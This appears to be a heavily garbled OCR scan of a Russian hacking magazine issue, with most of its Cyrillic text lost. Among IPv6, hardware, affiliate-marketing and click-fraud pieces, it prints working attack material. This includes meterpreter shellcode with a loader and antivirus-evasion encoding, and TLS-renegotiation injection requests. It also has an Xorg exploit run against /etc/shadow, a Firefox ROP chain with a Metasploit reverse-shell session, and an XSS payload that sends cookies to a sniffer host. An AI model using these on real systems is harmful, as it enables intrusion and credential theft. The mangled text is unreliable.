    The hidden lframe contains : http/lwordpresslwp-adminlplug!n-tnstall.php?tab-plug!n-lnformatlon&r iframe=te&wjd-640&hejght-58l

    Author: Chnian 8e1rtr!s

    #outerdiv { width: 1 ; height:Opx; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:O;}

    Last Updated: 1135 deys ogo Requlres WordPress Verslon: 2.5 or higher

    #inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height :1 00px; border: n ;}

    - WordPress


  • PCWNE

    IPV6-APEC ? , ,

    : 1v4- . ? ? ? .

    ,

    1v4- 1Pv6. :

    . 1Pv6

    , .

    Windows

    1Pv6: jpv6-test.com/ speedtest

    , 1Pv6: bjt.ly/rHoc4B SixXS : bjt.ly/vOIOAC

    ~ ~Torrent Windows [{)

    ! ~;t) ~ n n !v/ eredo

    uTorret Teredo


    '-' ? 128- [2001 :5c0:1400:a::68dl 32- [65.148.151.1241- 1v6-. : 1v6- , . , ,

    1v4- . , 1Pv6,- I-, NAT . ,

    . . 1. ,

    NAT. NAT, 1v4- . , [ii- , [!

    . NAT : , , . iCQ,

    I-, . [ !, 1Pv6 . , , , 1Pv4 1v6 [

    1Pv6 ! . , 1Pv6. , , , 1v6-

    . 1Pv6 , [ 1Pv4-apecal .


  • [Screenshot: gogoCLIENT connection settings. Depending on your environment, you will connect to the gogoSERVER either anonymously or with authentication credentials. Server Address: anonymous.freenet.net, with "Connect Anonymously" selected]

    2. 1v6 -. , - (, Bitoentl, 1Pv6

    , . ,

    . . IP UOP, UOP 1Pv6, 1v6- U-, . , , >> 1v6- 1Pv4 ( , UOPv41.

    , . 1Pv6-to-1Pv4?

    , 1Pv6 Uv4-: , ,

    . 3. .

    , - . , tnt-, N', ,

    I- ( !. 1v6-, . , , N', -

    I- ( 1Pv6, ! . tnt 1Pv6: uToent, Azueus, ansmission. 1 Pv6 ( ! , , . s6,

    , 18 (16-, 2-nopl .


    1Pv6:

    [Screenshot: gogoCLIENT Connection Status and Tunnel Information. Tunnel Mode: IPv6-in-UDP-IPv4 Tunnel (NAT Traversal), with the local and remote endpoint addresses]

    N' . gogoCLIENT NAT Tavesal,

    [Screenshot: IPv6 connectivity test. The Internet connection is IPv6 capable (2001:5c0:1400:a::68d, gogo Inc., address type Global Unicast) and IPv4 capable (62.148.151.123)]

    1Pv6- IPv~-apeca. ,

    , 1v6- , . , thepiatebay.og ipv6 .n nm-club . u - n .

    4. . n

    ( > , ! . , , > :1.

    . .

    , 1v6- .

    , - 1Pv6? , , , - 1v6- . , - ,

    , - , ( , > ], , - , . n , - , 1Pv4. , , 1v6-, ,

    , - . . .

    , .

    1v6-, . . 1Pv6 ( ] ,

    . NAT, 1v4- , , n ,

    . 1Pv6. .


  • PCZONE

    Gogonet/Freenet6 gogonet.gogo6.com

    n , n , NAT. GUI-

    , n/56-n . 1Pv6, , , . .

    Hurricane Electric 1Pv6 http :Uwww. tu n ne 1 ker. n et

    , /48-n 1v6- . , no

    [, , , , , , ! , , . ,

    , IP.

    SixXS www.sixxs.net

    I-, , n , 1Pv6. [ ! 40 . : n [ Linkedlnl, . > [ it . ly/snYfdm l.

    6to4 1v4-, 6to4- 1Pv6.

    , . 6t4- 1v6-, 6t4-,

    1v4-, 1v6-. 6t4- 1v6-,

    anycast-apecy 192.88.99.1. , 6to4, 1v6- 1v6-. , .

    6t4- , - 1v4-, , , 192.88. 99.1. . 6to4 , 6to4

    , , , . - ,

    . . I-, 1Pv6. 6to4 n . , ,

    , , 200 .

    Teredo , I-, NAT. 6to4 - -


    0 n 1Pv4 , , 62.148.151.123

    n 1Pv6 , , 2001:5c0:1400:a::68d , 1Pv6 n: freenet6 t ! r 8-ro ~ 2011 . ~

  • & I-

    93.100.186.155.pool.sknt.ru [uTP] 178.255.14835

    200 :2000 :4008:3 :224 : 7 eff:fE01: 84 2001:250:1401:3120:59d1:58a:801d:c095

    m 94-192 -124-184.zone.bethere.co.uk

    1v6- -

    : , , 1Pv6 UDPv4 . ! , ) gogo6/ Feenet6 lgogonet .gogo6.com ), .

    , , , 1Pv6, n,


    1Pv6:

    % 1J orrent 2.2 DHP 100.0 703.8 kB/ s libTorrent 0.12.6 D 100.0 3613 kB/ s Bit ornado/031 D 100.0 78.8 kB/ s 1-1 orrent 1.8.5 UD 45.7 12.0 kB/ s

    Bit orrent SDK 2.0 D 100.0 0.7 kB/ s

    . feenet6, gogo6, n. : 1Pv6-in-1Pv4 l

    , IP), 1Pv6-in-1Pv4 NAT vsli 1Pv6-in-UDP-is- 1Pv4),

    , IP, 1Pv4-i-1Pv6la , 1v4-, 1v6-). n n TSP ITue l Setup Potocol) . , n .

    : 1. gogoCLIENT lgogonet.gogo6.com/

    pof il e/gogoCL I ENT). 2. ,

    Conect>> .

    , n , - 1Pv6-pecypc !n, ipv6.goog le.com). . - n 3653. . ,

    1v4- n 1Pv6. 1v6- , : 1. lg ogonet.gogo6 .com/page/feen et6-

    egistatio ), feenet6 . 2. > , . 3. > .

    1v6-, - no n test-ipv6 .com. - n .

    feenet6 - lusename.boke.feenet6 . net). , n n plain-text'e. , Advanced PASS DSS 3DES1 Digest MD5.

    IPV6 feenet6- , n 1v6-,

    . , , , !n, ). , - . , n 1 , . ::::


  • / EASY GreenDog , Digital Security ltwi tter.com/a ntyurinl

    SMS ii'J.!i

    - ! , IDS, DMZ, PDF - ,

    .~ , SS-, . ,

    SMS. , , . (

    ). - , . :) - Smsglobal [www.smsgloba l.com). , -

    WINDOWS

    , Windows 7/2008, , , ,

    , .

    1. n . 2. :

    . {ED7BA47e-8E54-465E -82 5C -99712e4EelC}

    - , ,

    . , EasyHack. :)

    051.

    -

    n 25 SS- . , [ fs 7 Sende 10) . ! n , n n

    . n no , n nn, n n SMS 1 . ,

    n , SMS. n, -

    e-mail, - n SMS. , , ,

    - .


  • , - . , - !- . !! , ,

    . , -. , . ! ,

    - . ,

    . XXI ! -, - . :1 thn- Findmyhash lcode.google.com/p/f indmyhashl. ,

    -. >>, .

    :

    python findmyhash_v1.1.2.py MD5 -g \
        -h a2Sb2?1eba9de114~9adc7dfbea7235

    python findmyhash_v1.1.2.py NTLM -f hacked_domain.txt_

    RDP

    , - , , , , -

    , . , , , . ,

    , , .

    . RDP- Windows . RDP , 6- [ Vista Sv 20081.

    , d-.

    . , ? Default.dp, [, RDP 61.

    , passwod .

    , CyptUnpotectData[J cypt32.dll . , [ !.

    , , , SID , .


    EASY

    : -h- ; -f- ; -g- Google.

    , .

    MDS NTLM-xwe

    - Cain&Abel [www.ox id .i t l.

    Remote De sk top Passwo d Decode d-. & .

    , MSF . d .

    MSF, :

    1. mtt . 2. st-:

    ~ Defoult.rdp Notepa.d

    d-


  • 1 EASY

    SSLV-

    HTTPS. mai - t he-mi'dd l e SSL- , SS Lv3/ LS. - , BEAST -

    . : , , ap-spoofig.

    - SSL

    [ ap-spo of i g ). . ? SSL. 2009 - TLS/55Lv3 eegotiatio vul [CVE-2009-35551 . , [ ,

    ) . , 10 % [ : www.ssllabs.com/ssld/aalyze.htmi l .

    . , , , . , :

    11 TLS hadshake [ 11 .

    1.1 LS [ 2) .

    1.2 2.

    2) [ eegotiatiol. ) 1, ,

    2 [ Sessio \0, , 1 21.

    [Diagram: TLS renegotiation between Client, Attacker and Server (S). The client starts TLS handshake session #1 (client-server) and the attacker holds the packets. The attacker completes its own TLS handshake, session #2 (attacker-server), and sends commands of his choice. Renegotiation is triggered, and handshake session #1 continues (client-server) within the encrypted session #2 (attacker-server). Client data is encrypted within session #1 (the attacker cannot read or manipulate this data); the previous data from session #2 is prefixed to the newly sent client data.]


    . 4) ,

    1.2, , 3.

    , , >> . , , [ 1.1 1.21. [gtitil [ 21 [ 31.

    . [

    :11- ? TLS- [Sessio \0) .

    , >> . , .

    . [ 11 [ 1.11. ,

    [ 3), .

    ? , , [ , ) . [www.g-sec.lu/pacticaltls . pdf ).

    . -, SSLv3/TLS, HTTPS, FPS, SMTPS, 35 . . , . ? . ,

    - . , ,

    ~~ M isceii

  • . , . , : 1. URL. , CSRF, G-. - heade

    ijectio.

    1) uiae 1. 2 GET /path/to/resource.jsp /1. Ignor-me: 2) , ,

    : GET /path/to/resource.jsp HTTP/l.e

    Igore-me: GET /index.jsp /1. Cookie: sessionCookie=Token

    2. Redirect HTTPS . sslstip . HTTPS.

    , , . , sslstip -

    . SSL eegotiatio :

    EASY

    , ( 1.2):

    GET /url_that_will_e2_to_HTTP Ignore-what-comes-now:

    3. XSS. w- TRACE, JavaScipt-o.

    1.2 : TRACE / /1. X:This cotent will refiected i the respose to the cl

    ietalert('XSS') X-igore:

    . . Pytho, . :1 ,

    , - - (www. ss ll abs . com/ssld/a alyze . html), ssltest, BackTack 5, ssltlstest .

    100 /- , XOR METERPRETER IJ.liaf.ir.:i

    mtt Metasploit (www.metasp loi t. )- . , , mtt

    . , - - ( ), -

    . mtt, - - . .

    . ... , .

    MSF msfpayload - ,

    . :

    . .(avastl -~ -- -~-----

    .... , "D:\prj\av_test\test_3.exe" . '"

    , 3

    :

    1 :

    :

    XOR rocks! Avast


    0:00:00

    1/0 15,1

    --i"

    #msfpayload windows/meterpreter/bind_tcp R 1 msfencode \ - 5 x8/shikata_ga_nai -t - test_.c

    : windows/meterpreter/bind_tcp- MSF;

    R - ; msfecode- ;

    - 5 x86/shikata_ga_nai- payload ; -t - : ;

    - test_.c - .

    msfencode, , . msfpayload R, stage- , (mtt- -). , , . , MSF payload , . msfpayload - ( l.

    - -, , . ! main - MSF,

    . :

    int main(int argc, char **argv) {
        int (*func)();
        func = (int (*)()) buf;
        (int)(*func)();
    }


  • / EASY

    igned h buf [] "\x72\xc9\xac\x95\x39\xl\xll\x15\x8\xe8\x38\x96\xe5\x05\x7d\xaa\xfc "\xcd\xe3\x60\x74\x57\x4a\xaf\x2d\x94\xl3\x4b\xe3\xd4\x3a\x48\xc4\x7c

    "\x34\x46\x56\x7a\x82\x7c\x5f\x3b\x54\x8e\x40\xa4\x3e\x2e\xa0\x75\xf "\x86\x78\x63\x4f\xf9\x91\xe\xlf\x7f\xc8\x33\xld\xfd\x78\xeb\x2e\xa "\xdl\x42\x2f\xd0\x99\x69\x25\x22\x77\xc\xaa\x3\x65\xdc\x03\x7f\xa "\\83\f2\59\2\\28\\\86\\39\7\49\\2\ "\xa\x2a\xf3\x4a\x62\x40\xd7\xdf\xa0\x7f\x83\x19\x95\xdl\x9b\x8b\xao "\x93\xc7\xc5\x32\x01\x59\xc2\x5d\xef\xld\x09\xb\xac\x81\xc4\xlc\x9 "\x09\xce\x74\xdd\x87\x8c\xl0\x43\xa3\x95\x44\xa4\x75\x54\x0a\x4b\xda

    "\x38\xf5\xa9\x87\x37\x47\x42\x19\x05\x75\xde\x4a\xc8\xc\x5~\x7e\xO "\x49\x2c\x05\x61\xc3\xlf\xle\x30\x8b\xad\x51\x28\x2f\x59\x07\xf0\xf

    "\x2c\x92\x87\xaf\x9e\x73\x9f\x3b\x5\xc2\xc3\x04\xcf\x40\x06\xf4\x9 "\x95\x2c\xla\xd0\xe\x7\x50\xe\xf2\xf3\xlf\x4f\xf6\xcc" ;

    (int arqc, char arqv)

    int i; f (i=O;i

  • WEXLER.HOME 903 n , n n ( n ,

    nn). , n n, n . handycratta , n . , , n .

    n n n . WEXLER.HOME 903 64- Windows 7 n n n

    , n .

    wexLU.

    -~

    ltel Core i5-650 3,2 - 4 . CPU

    Turbo Boost, (

    , ]. , .

    GeForce GTX 460, Fermi.

    DirectX 11 GTX 460 , NVIDIA 30 Visio , PhysX CUDA

    , . .

    WEXLER.HOME 903 4 , .

    . , , , .

    . WEXLER.HOME 750 . , , .

    WEXLER.HOME 903 Windows 7 . n

    64- : 4 n n.

    , n n Microsoft Security Essentials Office 2010 Starter (

    Word Excel, n n n].

    Windows 7 . * wexLer:

  • /

    , ! , , ,

    . , !

    1 Apache mod_proxy CVSSV2 5.0 111111111 111 11 1111

    []]I3] : 11 2011 . : Rodigo s . CVE: CVE-2011-3368.

    1 IAV:N/AC:L/AU:N/C:P/I:N/A:N]

    !, Nginx Squid], Apache ,

    mod_poxy. -

    !, ], , . , mod_poxy,

    .

    1:i RewiteRule PoxyPassMatch -, , -. Apache . .

    , - :

    RewriteRule (.*)\.(jpg|gif|png) http://images.example.com$1.$2 [P]
    ProxyPassMatch (.*)\.(jpg|gif|png) http://images.example.com$1.$2

    , . :

    GET @other.example.com/something.png HTTP/1.1

    -, , :

    http://images.example.com@other.example.com/something.png

    , othe.example.com, images.example.comra . URI lraothe.example.com/something.png /1 .1 1

    , n


    livinside.iogspot.comJ 1115612, . , .1]

    400 Bad Request. n SECFORCE . n : goo.gi/Ob6yV. mod_poxy n

    , IDMZ]. , Apache ! Apache, ,

    ]. n , :

    python apache_scan.py [options] [options]

    -r: Apache -: n, Apache ( 80) -u: URL ( /) -d: (DMZ) (

    127. . .1) - : n DMZ ( single port scan) -g: GET-anpoc DMZ ( /) -h:

    :

    python apache_scan.py -r www.example.com -u /img/test.gif , DMZ python apache_scan.py -r www.example.com -u /img/test.gif

    -d internalhost.local , DMZ python apache_scan.py -r www.example.com -u /img/test.gif \

    -d internalhost.local - se -g /accounts/index.html

    if.!;ldjfi Apache Sv 1.3. 1.3.42; Apache Serve 2.0 . 2.0.64; Apache Serve 2.2. 2.2.21.

    JOi,J!iijiI mod_poxy

    lgoo.g l/xNiqR]. , RewiteRule :

    RewriteRule /(.*)\.(jpg|gif|png) http://images.example.com/$1.$2 [P]


  • 2 Xorg CVSSV2 5.7 1111 11111 111 1111 1111 111

    [AV: L/ AC:L/ AU : 5/:/1: / A:PI

    : 28 2011 . : vladz . CVE: CVE-2011-4029.

    vladz g, /tmp/.tX-lock [-

    Xl. .

    , - .

    1I g /tmp/.X -lock . - : [! /tmp/.tX -lock O_EXCL PID, /tmp/.X-lock, . /tmp/.Xn-lock. , , . , chmod[l

    , , /tmp/.tXn-lock , !l.

    , /tmp/.tXn-lock open[l [ 2961 chmodll [ 3181.

    , , ... g [ l, [ 341 1 , chmod[l? :

    # strace :1
    [...]
    open("/tmp/.tX1-lock", O_WRONLY|O_CREAT|O_EXCL, 44)
    write(e, " 2192\n", 11)
    chmod("/tmp/.tX1-lock", 444) =

    , SIGSTOP SIGCONT, . ,

    . , :

    ACDSee FotoSiate 4.0. Access Vi ol atio. 5 -


    1. - [PID nl. 2. , SIGSTOP

    /tmp/.tX1-Iock. , chmod[l.

    3. /tmp/.tX1-Iock.

    4. /tmp/.tX1-Iock -> /etc/shadow. 5. SIGCONT, chmod[l

    444 /etc/shadow.

    , , -,

    , . - : /tmp/.X1-Iock -> /dontexist. - FataiEo[l.

    exploit-db.com, 10- 18040. :

    I]!'I . xcomoq_. ~ _xch_mpd ~n:;s. . /xchqg [ /} /J1] ( .. - .l'e.t _cjshadow)

    i . ls -1_ 1 etc/ sha_dow _ -rw-r----- 1 roat sh_adow 187.2 Aug 7 e_7:1e_jetc/shadow $ .Lxchmod [ +] Trying to stop )(Qrg p_roc_e_ss right before chmod () [+] Process ID 4134 stopped (SIGSTOP sent) [ + ] __ Rei119V_ing /tq/. tx1-lock launching another Xc:Jrg process [+] Creating evil sylink (/tmp/ .tX1-lock -> /etc /shadow) [ +] Process ID 4134 resumed (SIGCONT _sent)_ [ +] Attack succeedec!, ls -1 /etcjshadow: __ -r--r-cr-- 1 root shad()w 172 Aug 7 H7:1e .. /.etcist)adoi>!

    lt1;11Jf1 g 1.4 1.11.2. g 1.3 USE_CHMOD.

    'iJ!IijiI g 1.11.2 1.12 .

    Array.reduceRight 6-6 Mozilla

    Firefox CVSSV2 10.0 11111 1111 1111 1111 11 111

    [AV:N/AC:L/AU:N/C:C/I:C/A:CI 1I

    : 13 2011 . : Chis Rohlf, lvnitskiy, Matteo Memelli, dookie2000ca,

    si3, m _me, TecROc. CVE: CVE-2011-2371.

    Metasploit, Mozilla Fiefox 3.6. ,

    educeRight[l .

    1I educeRight callback : [ iik-l, , , -


  • /

    Firefox 3.6.16. (generic/debug_trap)

    . iik- l ), .

    educeRight JS- _t js. . 2740 Aay.Length :

    jsuint length;
    if (!js_GetLengthProperty(cx, obj, &length))
        return JS_FALSE;

    js. 2767. JavaScipt-oe educeRight, start, end step .

    jsit ! ) .

    jsint start = 0, end = length, step = 1;
    switch (mode) {
      case REDUCE_RIGHT:
        start = length - 1, end = -1, step = -1;

    start = length -1 , start , length- . JS-

    , , :

    ~/head> var myobject = document.getElement8yid( 'd' );

    function spray() { 1/ ...

    }

    spray(); obj = new Array;


    obj.length = 2197815382; f = function trigger(prev, myobj, indx, array) {

    alert(myobj[ e]); obj.reduceRight(f, 1, 2, 3);

    spayll heap spaying ASLR. R-:

    181F1886 1e1F188

    183E8D78

    183E8D7D

    1D8 1D83

    141 14

    1846917 1846918

    12 121

    1e2Eeees 16

    181F1886 1elF18e7

    18283481 18283482

    121

    78891 > 78893 78894 78896 78899 7889 7C889AEF 7C889AF2 7C889AF4

    7C889AF9 7C889AFA

    18838768

    ; RETN

    V ESI,DWORD PTR DS:[EAX] ; kernel32.Virtua1Alloc

    RETN

    8 xul.18838768 RETN

    8 RETN

    EDX RETN

    xul.184C26Fe RETN

    EDI xul.182AC881 RETN

    RETN

    PUSHAD RETN

    RETN

    MOV EDI,EDI xul.182AC881 PUSH 8 MOV E8P,ESP PUSH DWORD PTR SS:[E8P+14] PUSH DWORD PTR SS:[E8P+18 ] PUSH DWORD PTR SS : [E8P+C] PUSH DWORD PTR SS:[E8P+8] PUSH -1 CALL kernel32.VirtualAllocEx ; // ; 8

    REN 18

    JMP ESP ; payload

    Metasploit.

    msf > use exploit/windows/browser/mozilla_reduceright
    msf exploit(mozilla_reduceright) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(mozilla_reduceright) > set lhost 192.168.8.121
    lhost => 192.168.8.121
    msf exploit(mozilla_reduceright) > set uripath test


  • n n mod_proxy

    uripath => test
    msf exploit(mozilla_reduceright) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168..121:4444
    [*] using URL: http: ;;e.e.e.e:sese; test
    [*] Local IP : http ://192.168.e.121:8e8e/ test
    [*] Server started.
    msf exploit(mozilla_reduceright) > [*] Sending exploit to 192.168..123:174 ...
    [*] Sending stage (752128 bytes) to 192.168 . .123
    [*] Meterpreter session 1 opened (192 . 168..121:4444 -> 192.168..12:175) at 211-1-17 18:2:4 +4
    [*] Session ID 1 (192.168 . .121:4444 - > 192.168..123 : 175) processing InitialAutoRunScript 'migrate -f'
    [*] Current server process: firefox.exe (1992)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 1652
    [+] Successfully migrated to process

    if.1 ldjfi Mozilla Fiefox 3.6.16, 3.6.17.

    , .

    ' ACDSee FotoSiate id, L- CVSSV2 10.0 111111 11 11111 111111

    ll1:iim : 10 2011 . : Pavez w, jua vazquez. CVE: CVE-201 1-2595.

    111 IAV:N/ : L/ AU: N/C:C/1 : / :)

    ACD FotoSiate- , ,

    46 57. ,


    . 12 , , Metasploit, . , ACDSee FotoSiate 4.0 ! 146)

    id Stig, . L- ACDSee FotoSiate

    . S- . --t, , . 263557 ipwssl6.dll.

    :

    msf > use exploit/windows/fileformat/acdsee_fotoslate_string
    msf exploit(acdsee_fotoslate_string) > set payload windows/exec
    payload => windows/exec
    msf exploit(acdsee_fotoslate_string) > set cmd calc.exe
    cmd => calc.exe
    msf exploit(acdsee_fotoslate_string) > exploit
    [*] Creating 'msf.plp' file ...
    [*] Generated output file /home/pikofarad/.msf4/data/exploits/msf.plp

    , ! ) .

    jf.!;ldjfi ACDSee FotoSiate 4.0 Bui ld 146.

    ,_i,]!liiiI , . ::

    g


  • , qweeqweqweewq [ alias sygwoc5eqwlbwfv ) [ )

    [ 1 [ )

    (http //httpz net) n (http.//152 137 21 . 112) ip

    XS S

    ur1 xss

    !

    -8 [ 1

    [ email 1

    n (http:l/site.com/xss.php?id=">)http://site.comlxss.php?id=%22%3E ( xss ). javascript , n

    ur1 r , I., _ .:_fr_a_~s~t> ,_ ., .. _.

    , - - stip_tags[J, . ,

    . , :

    6~1:

  • ?

    JS- SS- . ' :

    ! l, , .

    . , , , ? - 20-30 JS- , .

    JS ->> :

    var servers = [ 'http://freel.hostl.com/' 4 'http://free2.hostl.com/' ,

    'http://free.hostl.com/' ,

    'http://freel.hostS.com/' , 'http://free2.host5.com/' , 'http://free3.host5 . com/' ]; for ( var key in servers) {

    }

    document.getElemetByid( 'footer' ).innerHTML += 'cscript src="'+servers[key]+'">' ;

    if (loaded){ break;}

    if (loaded){ .. . }

    loaded, , . , , . ,

    . - . ,

    , . ,

    logs.txt, .

    -------lr~

    -


    2130000

    , ,

    XSS:

    $_SERVER['HTTP_USER_AGENT'] - ;
    $_SERVER['REMOTE_ADDR'] - I-;
    $_SERVER['HTTP_REFERER'] - ( n );
    date("d.m.y H:i") - ;
    urldecode($_GET['c']) - n ;
    $_SERVER['QUERY_STRING'] - .

    , stip_tags!l. , Django, . , n , SS-. , ,

    , , .

    , , - ,

    .

    , , L-. . XSS , - . . :

    c!>chtml>

    , - , , , , - . !,

    - demotivatos.u L- l ). ,

    , , , -.: - )


  • !

    XSS DEMOIVATORS.RU

    XSS , . : 1. - XSS

    , vkontakte . u , ma il. u , d .u . . XSS ,

    . , d emo ti vatos. u .

    , XSS :

    Jl "" function (){ return new Image();} var xss_l;n(), xss_2;n(), xss_;n(), sniff ; 'var ; new Image(); x.src ; "http://tvoi.sniffer.comj?c;"+ escape(document.cookie); ~

    // n XSS n "" xss_l.src ; 'http://_sitel.ru/search. php?q;">'+sniff+'' ; xss_2.src ; 'http://site2.ru/search. php?q;"> ' +sniff+' ' ;

    xss_.src ; 'http://site.ru/search. php ?q;" > '+sni ff+' ' ;

    [-

    2. . n: no

    , , n, , n JavaScipt-o, XSS div-co,

    , . n, n

    :

    n :

    window ._on.load;function() {

    document.getElementByid( 'banners' ). innerHTML ; '' ; }

    3. n n . n

    JS + , n n n

    . n: n JS-, n, JS-n

    n , action n n.

    !, nl n n tin-.

    !n, ! . 4. n

    n pop-unde pop-up. n

    , n. 5. n

    ifame. , n .

    6. - n n JavaScipt :

    document.getElementByid( 'id_dema' ). src; 'http://host . ru/podmena.jpg' ;

    7. : ifame !n

    !. 8. n

    JS-.

    {xss}- javascipt-o . , . .

    , , . , AJAX. , ,

    - HTML + JS. ,

    . .

    , . , - . SS-, , .

    , n- n , , , . ,

    . . :

    < !DOCTYPE >< FRAESET onload; "{xss}" >

    , , . :

    < !DOCTYPE> < FRAESET onload; "{xss}" style; "display:none;" >


    .

    , l l.

    >>, XSS - .

    , ,- , demotivatos.u.

    . : 500 .

    12 1180 !,

    . , . ! ::


  • - DBMX

    ..........

    , ,

    , -

    ! ,

    .

    www.master-x.com -

    .

    www.aofuckbjz.com -

    -.

    www.rxpblog.com -

    .

    (

    )- , . - , .

    . , . , . - ,

    . , , , . ,

    , , .

    :

    -

    , - ,

    .

    .


    , .

    ,

    , .

    () . , ,

    , -

    ,

    .

    ( ) , -

    ,

    , ,


  • lg_eeics,

    , ] . ,

    , , , ,

    .

    - - , ,

    30-50% .

    ,

    - . -, ,

    . l, , ] . .

    , . .

    ! ].

    . , .

    - ,

    , :]. , .

    : :

    :

    , - .

    - .

    , , , .

    , , . - .

    .

    Phamcash.com RX- Pates . iz Stimui-Cash.com OXOetwo k.com

    201 2006 2006 2007

    / -: 40% , 30- 50% ! 75% 70% 100 - 45%, ] 300 - 50%

    , , , , , , . , ., . , ., ., , , , , , , . , ., ., .

    Visa, M asteCad, Visa, MasteCard, , Visa, MasterCard, , Visa, Euro D eit, , Wire , Wire Wire, MoeyGram Wire, M o eyGram

    $100 $100 $50 $1 00 / ,

    -

    , - 110 ], - ! ,

    ]


  • -

    . t >> .

    . , , x h amste.com ,

    . , .

    , ? , -

    . , ,

    . $30.

    - 40-60%.

    , . , .

    [ l, .

    - ,

    . , . [ !,

    .

    , [!. WodPess >> .

    - .

    FGH [ ,

    / -

    -

    /


    Royai -Cash .com

    2001

    50-60% $30-40

    44

    check, wie, n, , WebMoney, Paxum, eCoin

    EanCoin . com Aepatneship.com

    2003 2003

    50% 50%

    23 173

    check, wie, wie, n, WebMoney, Paxum, WebMoney, Paxum, eCoin, ePese eCoin

    $100 $100

    : :

    :

    l. , FGH . , - , , , .

    .

    FeoCash.com CashManiacs.com

    1999 2003

    50% 50%

    58 128

    Paxum, check, wie, ePaySevice WebMoney, Paxum,

    ePaySevice

    $300 $50


  • ( PER CLICK) . cl ick- . - ' , - .

    ! ), , . , . , ,

    . Iid) , l) . , , , , - . - . , id , .

    , , .

    ,

    . , .

    :

    . ,

    .

    , ,

    ! -

    , ).

    ,

    . - .

    Bidtaffic.com Click9.com

    2004 2008

    / - 70- 95% 70%

    $40 $50 - ePasspote , Epese,

    PayPal, Webmoney, StomPay, Wie EPESE, WebMoney


    Peakclick.com Daoclick.com

    2005 2009

    70% 80%

    $100 $50 Wi e , Webmoney, ePassporte, ePassporte, Westen Union, EPESE, WebMoney PayPal, Wire

    : :

    :

    Thegreenppc.com Bizzclick.com

    2009 2009

    80% 75%

    $50 $10 Webmoney, Wire, ePassporte, PayPa l, PayPal StormPay, EPESE,

    Visa, MasteCard, Western Union, PayPal, Wire, Liberty Reserve, WebMoney


  • : :

    : & .

  • : : : ' ,

    . - , , . ,

    . - . , .

    ! !, , .

    / - -

    /


    Glavtog.com

    2010

    !! 25- 35%

    Webmoney, Epass, PayPal, Wie

    $100

    n n n n

    -. , , : -. , ,

    .

    ,

    XML , .

    .

    , .

    Stimui-Cash.com Affiliate-pogam . Amazon .com KingsPofit .com

    201 1996 2010

    !!

    !!

    25% 4- 8% 25%

    Webmoney, Epass, PayPal, Check Webmoney, Wie Wire, ePesee, Moneybookes

    $50 $10 $100


  • Appearance

    Plugins

    JAVASCRIPT

    [Screenshot: Firefox Add-ons manager listing BetterPrivacy 1.66, Download Manager Tweak 0.9.5, Flashblock 1.5.15.1 and NoScript 2.1.2.5rc1]


  • . life4u apoo la. e . faronovlagm ail . com l

    AdSense 10 .

    . , .


    www.qoogle.com/ ~-Google AdSese; direct.yandex.ru .; www.spybox.com. !li.-

    - SpyBox; www.adwatcher.com -

    Adwatcher; ~- ; l!iYti.ll&r!l - Piwik; www.qooqle. com/anaJytics/ .

    [ . click f aud - )- , [ ) . [ , , ), [ - ) . , 10-15 % .

    , . - -.

    , . , . ,

    . AdSese . , >

    . , ,


  • / (~

    SpyBox

    ~- ~ " " u

    " " " ..

    B~oru,..,_ ... ,.. ,>O~, !

    n-, $0,1 ] . : n n , nR,- - ! t~R nn n. n n

    n n t~R, n n ~ t~,

    n . n, n, n R . n n .

    , .

    n . n .

    n -n IPay-peCiick- n, n ,

    High Threat .. Heat l


    : R AdSense

    [Chart: unique clicks, clicks, actions and sales over a selectable timeframe]

    - Adwatcher

    n , ] . n , n . ! , IP n n ).

    n , n .

    , n n , n n ,

    . n ,

    n . 1. n I- ,

    n, - . , I n .

    2. n, n n , , :

    , n nn , n .

    Click


  • .

    ?

    n: n -n ? n , n / n . , n. 2007 n Yahoo! n .

    Checkmate Strategic Group. n Yahoo! n n

    2004 . 2006 Google 90 . n n nn

    , , n n

    n .

    . n, n , n [ , n , ), : n- n

    . 4. n ,

    , . n . :

    n, n [n, - n ),

    n , n 100. n n

    n. 5. n

    , n n n .

    : SPYBOX , n . n n n

    . , n/ n, , n

    . n , 100% , n [ , n ) .

    n - n SpyBox. , n -, n n, n n, n n, , , - .

    n: n n L-,

    n . n [ ):

    var script = document.createElement('script');
    script.type = 'text/javascript';
    if (localStorage.spybox) {
        var spybox_hash = 'a181a603769clf98ad927e7367c7aa51';
        var spybox_session = localStorage.spybox;
        script.src = 'http://ua.robotreplay.net/fast.js';
    }
    document.getElementsByTagName("head")[0].appendChild(script);

    n , n , n .

    n n : n , n ,

    - n. n n, n . , IP n

    n n n [ n n n , - ),

    . n . n, SpyBox

    : n n n [ 1000 ), n [ n , n , ,

    n ) .

    ADWATCHER SpyBox, , , . , n

    , , ? Adwatcher, , SpyBox,

    !

    , ,

    nn . , ! 2003 n , n Google 150 . , n, n

    , Google Clique , n Google . , Google n,

    n . , n, . , , n

    2009 . Microsoft , , n Microsoft. 750 . - . , ,

    .


  • [Screenshot: AdWatcher campaign setup form with the fields Campaign, Search Engine, Group, Landing Page and Cost (Per Click), each followed by its help text]

    xakep.ru

    . - [ IP) [ , , , , , ).

    [ ) 3D- . , faud ts ,

    . ,

    , [ , ) :

    document.write( ' ' );

    , . Adwatche 30

    . , , ,

    , Adwatche SpyBox.


    : AdSense

    [Screenshot: AdWatcher Dashboard with quick navigation (new campaign, overview reports, financial reports, fraud reports), general information and monthly statistics for clicks, actions, sales and profit]

    , Google Analytics

    , : Google Analyti cs Piwik [ -, ). , ,

    , . : , ,

    . , ,

    [ 40 , ), ,

    . > . ,

    . , , -

    . , - . ,

    , .

    , [ , ) .

    ,

    . , , , , , :). I


  • Mar licq 884888, http://snipper.rul


    URL: il lylpxtMKi

    : 'nix/win

    : Gremwell

    URL: www gremwell com

    : nix/win

    - , n , ,

    m? n ? ,

    MagicTee. n n n .

    IWAF, Acuetix, OpeVAS, Nessus, u, m . .), n n

    !n, m ikto) IHTML, MS Wod .) .

    !) ,

    , Magic !)- n n , n

    n ,

    . n n ,

    n n , www.gemwell . com/ documetatio .


    ALANA K!LLR , n

    - Apache l bit.ly/gvHB i ), , n . n

    n , n , n

    t l K!LLR

    S4luR4 n n -. n n , n

    n. , n

    : Danijel MaXoNe URL:

    it ly/orsgKn

    : Windows 2000/

    /2003 Server/ Vista/2008 Server/7

    /

